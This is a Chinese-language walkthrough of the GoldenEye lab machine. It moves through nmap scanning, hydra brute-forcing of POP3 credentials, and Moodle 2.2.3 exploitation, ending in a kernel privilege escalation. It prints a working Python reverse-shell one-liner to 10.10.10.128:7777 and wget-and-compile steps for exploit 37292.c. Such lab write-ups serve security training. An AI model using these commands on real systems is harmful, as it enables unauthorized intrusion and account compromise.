GoldenEye

总结：注意枚举信息，爆破密码，对图片的操作，使用cmd/unix/reverse 这个payload要powershell环境所以，要去后台修改编辑的环境，提权注意没有gcc所以改exp内容，用cc编译，没有思路就看看源码

修改编辑脚本方式【site myadministration->plugins->Text editor->TinyMCE HTML editor】

编辑器检查反弹shell：【Settings->Site administration->Server ->System paths->Path to aspell】

流程：信息收集nmap扫活的，然后仔细搜，获取对应信息发现高端口号的pop3服务，然后通过爆破的手段获取账号密码，登入后收集信息，发现网站，根据提示写入hosts，拿得到的账户密码登入网站，枚举信息，收集信息获得最后的后台权限。最后是提权利用操作系统内核漏洞将后台权限提权至网站权限。

攻击机ip：10.10.10.128

nmap -sP 10.10.10.0/24  看自己攻击机所在的网段在哪，然后去扫网段内存活网段 ，这里-sP就算扫存活的  

先扫存活主机，发现10.10.10.147

 然后在细致的扫，发现25和80端口

-sS 发SYN包  -sV  显示版本 

访问80，然后发现提示让我们去访问10.10.10.147/sev-home

 没有什么特别的发现，习惯性对网页的源码瞅一眼，发现

terminal.js 然后点开就发现新的提示了 

 

 言外之意就是，这个不知道是谁说boris的密码是

InvincibleHack3r

且natalya盯上了boris，我们此时我们得到了一个boris和ta的密码，所以先解码，这是html编码，解码得到  InvincibleHack3r

 此时我们就得到了账户一组账户和密码  boris/InvincibleHack3r，试着能不能登入刚刚那个页面

 

得到提示，在高端口存在邮箱端口，说明刚刚nmap正常扫没有扫全 ，回去再扫，发现俩端口，然后试一下，会发现55006不存在，那就是55007是邮箱的端口了

那么剩下的问题就是怎么获取邮箱内的信息，我们已知的人物信息只有boris和natalya，没有其他提示的情况下，我们只能选择爆破，那就先写账户字典，然后用hydra默认密码字典爆破去

echo -e 'boris\nnatalya' > id.txt   

写boris 和natalya 输出到 id.txt （也可以自己直接新建一个id.txt 往里面写boris和natalya一样的）\n换行的

hydra 10.10.10.147 -L id.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 pop3

-L 指定账户字典 -P指定密码字典 -s 端口   pop3  服务

爆破出来的账户和密码 boris/secret1!   natalya/bird 

 

然后就是去登入邮箱了看看里面都有啥

nc 10.10.10.147 55007 

用list列出邮件  用retr阅读邮件内容 

 从boris的三封邮件里可以获得的信息：新的人物 alec，xenia，root

再看natalya的邮件（登入方式同boris），获得的信息: xenia/RCP90rulez!

还有一个可以登入的url：severnaya-station.com/gnocertdir

如果无法访问，就需要我修改本地的hosts文件把10.10.10.147指向severnaya-station.com

vi /etc/hosts    增加圈起来的部分

 然后访问 severnaya-station.com/gnocertdir 点击intro ro GoldenEyes登入

 然后开始收集信息，CMS：Moodle  版本：2.2.3 新人物：doak

 

 在home->my profile->Messages 发现一封邮件，来自Doak的

 下一步就是将收集到信息利用一下，新的人物就放到id.txt去爆破，然后搜索引擎一下Moodle 2.2.3有无漏洞

 发现确实存在漏洞，那就用msf去找对应的模块来利用漏洞

 

发现新的账户和密码 doak/goat 接着用nc登入查看邮件

获得新doak登入培训网站（Moodle）的账户密码dr_doak/4England!

用doak的账户登入继续收集信息：

在home->myprofile->messages发现doak和admin有交集 ，新人物：admin

在my home -> my profile里面看到一个.txt 下载点开阅读，发现

 

 接着查看这个所谓的有趣的东西，然后先下载到本地

 给的是图片，那么图片表面上的信息没什么用，就用kali自带的对图片做分析的工具来试试

strings 查看底层内容，发现信息  eFdpbnRlcjE5OTV4IQ==  解码后是 xWinter1995x!

这是doak留给james，doak和admin有交集，而且前面邮件的信息是对话doak让james好好挖掘，那么这个解码的东西有可能就是admin的密码

 尝试用 admin/xWinter1995x!    成功登入！！！

其实前面就有尝试能不能直接利用漏洞的，但是没有反应，用的payload是cmd/unix/reverse

这个需要在powershel执行，现在我们有了admin账户就可以去插件里面看能不能修改一下，然后再尝试利用漏洞

在 site myadministration->plugins->Text editor->TinyMCE HTML editor 里面修改成PSpellShell

然后利用漏洞获得权限

 

 

 

 

 

{

拼写检查反弹shell：

反弹脚本：【python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'】

nc -vlp 7777

 

 

 

 

}

下一步就是提权了，首先直接uname -a查看内核，然后搜索引擎去找是否有漏洞，发现是有的

 

 

 既然有了exp就是直接利用，直接将文件复制，保存在kali为 37292.c

然后开启http服务

python3 -m http.server 9999

 

在获取权限的shell里面下载37292.c

wget 10.10.10.128:9999/37292.c

然后编译,会发现没有gcc

gcc -o 37292exp 37292.c

那看看有没有cc，发现有的

which cc

 那就要到37292.c里面把gcc改成cc，直接用cc编译

vi 37292.c

然后下载（wget 10.10.10.128:9999/37292.c），编译(cc -o 37292exp 37292.c)

得到37292exp后，先赋予执行权限，在再执行

chmod +x 37292exp

./37292exp